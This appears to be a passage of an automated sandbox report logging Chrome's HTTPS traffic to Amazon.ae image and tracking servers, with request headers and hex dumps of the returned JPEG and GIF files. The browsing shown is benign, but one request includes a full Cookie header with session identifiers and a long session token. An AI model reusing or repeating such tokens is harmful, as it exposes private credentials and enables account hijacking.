                                                                                                                                                                                                                                                                73192.168.2.449927151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2864
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 3c480315-e639-4234-aa33-22c3b0ddaaf9
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 10 Feb 2044 09:43:47 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1209468
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:30 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000173-IAD, cache-nyc-kteb1890040-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a0 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 08 02 01 09 10 00 02 02 01 02 02 06 06 06 06 07 09 00 00 00 00 01 02 00 03 04 05 11 06 12 13 21 22 31 41 51 07 32 61 71 91 a1 14 52 73 a2 b1 c1 08 15 42 62 64 82 23
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQ2aqRsBbd#
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC1378INData Raw: df d3 b5 57 cb 3d 19 e1 67 b9 a9 d4 95 0b 24 65 f2 51 e4 5e 44 33 0b 5e 1d 1b eb 9a 40 fe 29 3e 40 ce 9b 9c d1 c3 03 7d 7b 48 ff 00 a8 fc 11 cc e9 79 6b 07 96 5e 6b 5c fa 8c 7e ca 77 7f 57 6f f8 1f f0 32 2b 86 ff 00 b3 70 7e cb f3 32 53 24 ed 55 df 67 67 f9 4c 8c e1 df ec dc 1f b2 1f 89 9b 7d 6e 6c 7d 25 bf b4 7f 92 98 88 89 25 62 22 20 22 22 02 7d 03 79 f2 20 70 d7 a4 3c f6 d4 38 8b 5a b9 bc 32 ac ad 7d 89 8b fe ce a3 ee 6f 32 9f 47 3c 71 aa d1 95 8b a4 3a 59 9f 80 f5 65 a3 69 83 94 97 ad d0 bd a2 bd f6 e7 28 a8 59 6b 2d e6 89 de 27 df 4b fc 25 6e 8f aa dd a8 aa ef 89 a8 5a 59 5f c1 2e 7e d5 b5 37 91 66 dd d3 eb 86 f3 56 98 6f 04 e7 fe ac d7 74 5c af 0a f3 71 b7 f6 2d 8e 2a 7f ba c6 07 47 1d 4b 1d ee a3 58 d0 33 53 13 50 d5 b3 c5 49 80 00 fa 31 15 f7 ae
                                                                                                                                                                                                                                                                Data Ascii: W=g$eQ^D3^@)>@}{Hyk^k\~wWo2+p~2S$UggL}nl}%%b" ""}y p<8Z2}o2G<q:Yei(Yk-'K%nZY_.~7fVot\q-*GKX3SPI1
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC108INData Raw: 88 14 ed ac 3a ed 31 ac 8d 19 59 89 da 65 33 e6 c2 36 66 2f 30 c3 0e 86 27 9f d4 73 34 e4 11 c8 26 39 53 f1 16 61 a3 43 12 e6 ad 15 47 84 ca 79 04 fb ca 23 95 89 cd 69 47 63 e1 8a e4 88 1b 4f b1 32 84 c9 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 3f ff d9
                                                                                                                                                                                                                                                                Data Ascii: :1Ye36f/0's4&9SaCGy#iGcO2?


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                74192.168.2.44992454.194.230.1314437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:30 UTC957OUTGET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DC37SFEY0GDXEZ5HDEVRN:0 HTTP/1.1
                                                                                                                                                                                                                                                                Host: fls-eu.amazon.ae
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                Content-Length: 43
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                x-amzn-RequestId: ed42b532-0200-4e92-a7f7-62364c0d8c92
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                75192.168.2.449929151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621421_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2801
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: cc71806e-b607-4032-9dcb-7296a53e4d89
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 02 Mar 2044 15:25:15 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1877120
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200037-IAD, cache-nyc-kteb1890041-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9a 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 07 01 02 10 00 02 02 01 03 01 06 01 08 08 02 0b 00 00 00 00 01 02 00 03 04 05 11 21 12 06 07 13 31 41 51 71 14 32 61 72 73 81 82 a1 22 23 33 91 b1 b2 b3 c1 08 24 15
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQq2ars"#3$
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: dd 9d c2 77 1b d5 f2 ad d7 ed 72 1b f2 21 64 bf ed bf 77 3a 77 6b ac ae fc eb ee a4 d1 53 a6 f5 3a 2a 14 27 c4 3e 20 74 70 40 23 79 cc 34 ad 07 b4 75 53 46 26 95 a8 74 e9 b6 92 d5 64 d8 13 25 05 47 f6 5b d4 e9 bb 3b 0d 9b 61 d2 a9 e4 4f 13 9d c6 f8 9e 1a f1 e2 32 4e ba 7b b6 27 0d a6 d3 a8 7c 77 57 aa de dd a5 d4 b4 d1 61 f9 37 c8 05 86 9f 34 16 ab d6 a1 c7 b3 15 72 0f bf dc b3 6f ef 61 7f dc 5a af d9 27 f3 24 b9 ec 67 61 f5 1d 1b 55 b7 51 cd cc a3 24 3e 33 a0 35 61 57 87 66 ee f5 be ee 6b 45 eb 00 27 ab 36 d2 97 7a e3 7d 0b 56 fb 15 fe 2b 39 5c de 46 2c dc fc 19 30 fa c6 e8 bf 0d 2d 5c 77 8b 7d d0 b6 79 bc af e1 19 f3 e0 b7 b4 f5 4d 07 4b ee 7f b3 23 b4 3a ea 0b 46 f4 62 d3 6b dc 3d 1c 38 f0 56 bf c6 5f ef 55 69 3e 31 6b d8 6f 22 1f f8 7c ae e4 bf 5b f0
                                                                                                                                                                                                                                                                Data Ascii: wr!dw:wkS:*'> tp@#y4uSF&td%G[;aO2N{'|wWa74roaZ'$gaUQ$>35aWfkE'6z}V+9\F,0-\w}yMK#:Fbk=8V_Ui>1ko"|[
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC45INData Raw: 2d a5 ac 44 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 1f ff d9
                                                                                                                                                                                                                                                                Data Ascii: -D


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                76192.168.2.449931151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC688OUTGET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2939
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 1fffb071-e2c6-4c80-9220-5e54ae51a664
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 10 Feb 2044 09:43:47 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1725412
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100056-IAD, cache-nyc-kteb1890066-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a1 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 02 07 09 01 10 00 01 03 02 03 02 05 0d 0c 08 05 05 00 00 00 00 01 00 02 03 04 05 06 11 12 21 31 13 14 22 91 d2 07 08 23 32 41 51 52 74 81 93 94 b3 d1 16 24 33 35 42
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"#2AQRt$35B
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: 62 2a 8f 40 7f f6 57 4f 4b 33 9f 9e 6a c5 f4 ed 7e f2 50 77 59 c2 9d 4d 0f fa 8e a7 d0 9f fd 95 d7 98 f2 d3 86 ad c6 93 dc ed ca 5a e0 f1 27 0d c2 42 e8 78 3c b2 d1 96 6d 66 7a 96 b7 0d b6 27 ef 27 9c 7b 16 1e 66 06 3d ed 1b 83 8a 09 ab d6 bd f1 45 cf c7 e0 f5 6a 2e e2 ba 97 d3 df 2f 9a 1e f6 13 5d 57 da 38 b7 3e ca f5 28 ba d7 fe 27 b9 f8 fc 3e ad 47 7b ad aa 0b 85 fb 10 89 ea a1 a7 d1 5d 53 97 0d 9f 2b 39 5f da e4 46 e5 2a 98 88 bc ac 34 d8 6e 72 6d e1 27 9b 78 cb 4c 87 77 77 3c ca b8 aa b8 6d 77 16 9e a0 ed 19 70 8f db 96 dd fa 5d bd 6d 4c c2 f6 f6 ef b9 d1 1f bd d3 55 7d ce db 47 ce 54 5c cf fe e2 e5 8d 46 9c 4b 5d 95 35 9a 0b a7 c8 9e 59 f6 b4 e5 a1 fb 9d dc 1b 5d da ab b7 56 bc 9d 92 4b a7 2e ec 8e cf fa 1e f2 cd 9b 05 b7 6f f8 8d 1f 34 9d 35 75 1d
                                                                                                                                                                                                                                                                Data Ascii: b*@WOK3j~PwYMZ'Bx<mfz''{f=Ej./]W8>('>G{]S+9_F*4nrm'xLww<mwp]mLU}GT\FK]5Y]VK.o45u
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC183INData Raw: 6b 0b 98 0f 25 ce 82 26 38 8e f9 68 0e 03 9c ab 63 8e 6f 67 f6 af f6 d9 d0 5b df ea a9 ff 00 4c ff 00 36 10 75 2a 7f d3 3f ee 04 c1 a3 48 4c 4a b5 6b 98 02 ae aa e9 8b b0 f4 d5 0f d6 fe 3d 4b ca d8 36 31 e0 af 43 54 72 c0 1d 46 db 6a b8 5a ef 0d ab 3e f5 7b 9c f8 5e cd af 3a 72 60 61 1f 88 95 23 56 ec 82 22 20 22 22 02 22 20 22 22 0e 0e 60 5c 74 04 44 0d 01 7d d0 11 10 34 04 d0 11 10 34 05 50 0c 91 10 16 36 e1 4b 1c e3 96 33 44 41 8d 16 c8 3c 15 c8 5b 20 f0 51 10 3f 46 c1 e0 ae 42 db 07 82 88 83 35 04 6d 8d a0 35 56 44 40 44 44 04 44 41 ff d9
                                                                                                                                                                                                                                                                Data Ascii: k%&8hcog[L6u*?HLJk=K61CTrFjZ>{^:r`a#V" """ ""`\tD}44P6K3DA<[ Q?FB5m5VD@DDDA


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                77192.168.2.449933151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4622
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: ca1115d6-cc1f-484e-99b4-c7557b87d0d5
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Fri, 10 Jun 2044 08:40:35 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1057855
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000097-IAD, cache-nyc-kteb1890079-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8d 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 01 02 10 00 02 01 03 03 02 03 05 04 08 06 03 00 00 00 00 01 02 03 00 04 11 05 12 21 06 31 13 22 41 07 14 32 51 81 23 61 71 91 15 33 42 52 62 82 a1 a2 24 92 93 b1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"A2Q#aq3BRb$
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: b2 cc 73 e3 60 c5 80 a7 99 c9 38 f5 27 68 a2 e1 99 36 95 4f 6a b4 ce 9f b3 be 8e f2 38 a4 47 0c 24 40 c1 81 ca b0 23 39 53 d8 82 3c c0 8f 43 9a ca aa 33 d9 8e a4 d1 8b ad 2a fd f1 2e 94 ef 24 6e 3c d8 89 9b 64 ea 3e 68 1d 84 80 fe ec a6 af 4a e2 3c b2 82 5a 00 54 7e d2 f0 43 70 f7 89 b5 e5 66 28 a9 24 8c 17 61 ce 7c 35 01 f9 5d a3 b2 f2 5b 93 5b 6b b9 8c 51 b1 5e 09 18 04 f6 19 e3 27 f0 f9 7a fe 75 58 75 07 5f 69 7d 23 22 59 28 f1 af 1d 54 98 f9 22 15 3c ab 5c 3a 82 c3 77 75 85 70 4f a9 40 54 9c cb b7 48 de 28 ee 45 a1 1d c4 f3 c9 2b b4 31 44 a5 ce 0b e5 dc 83 ea 42 b0 03 f0 cd 65 c9 6d 70 62 25 7d d5 9f 9f 26 d9 55 4f f3 f9 bb 8f 9a 8c 57 1b 6a 5e d5 fa a6 e5 d9 8d ef b9 f7 fb 1b 68 56 20 3f 9d 83 ca 7e ac 6b d6 6f 6a 5d 49 69 71 21 8e fc 85 04 7d 8b 0f
                                                                                                                                                                                                                                                                Data Ascii: s`8'h6Oj8G$@#9S<C3*.$n<d>hJ<ZT~Cpf($a|5][[kQ^'zuXu_i}#"Y(T"<\:wupO@TH(E+1DBempb%}&UOWj^hV ?~koj]Iiq!}
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: 52 80 e6 7f 6a fd 2e 74 fd 48 6a 48 08 82 ff 00 e3 60 3e 09 d5 70 ff 00 57 51 e3 27 cc ef a8 1f 58 75 0d ee a3 ee f0 4f 1c 30 5b 5a 2e 62 b6 82 35 8e 18 84 a7 f5 8a 7b ba 4b fb c4 9e 41 c8 06 ba e3 a9 74 f8 b5 1d 3e e6 09 d3 7c 6c 01 75 f5 c2 1d db 94 fa 34 7f 1a 9f ba b9 fb 5c e8 eb 8d 05 00 bd 88 dd 58 03 94 b9 43 b1 e0 df df 2d 86 11 78 83 e3 47 0d 0c de 84 31 e3 51 92 4e 99 54 ed 59 5c 41 61 35 a4 89 1d cc 26 33 75 04 6f 0e ff 00 b3 0e 8e 43 46 ff 00 22 8e 46 de 70 17 76 4e 31 5b 8d 4b 49 12 69 7a 02 47 12 24 be 1d eb dd cf 81 e2 28 f1 98 a9 97 9e 54 44 03 46 30 49 07 2b 59 dd 49 a7 dc 75 15 dc da 89 bb 8e 57 95 50 63 78 b1 74 55 f8 51 63 99 9a 00 17 e4 93 b5 62 de 74 7c cd 61 62 10 48 27 0f 2f 8e cd 35 b2 44 54 30 10 ec 26 45 45 21 3d 77 35 6b b7 4d
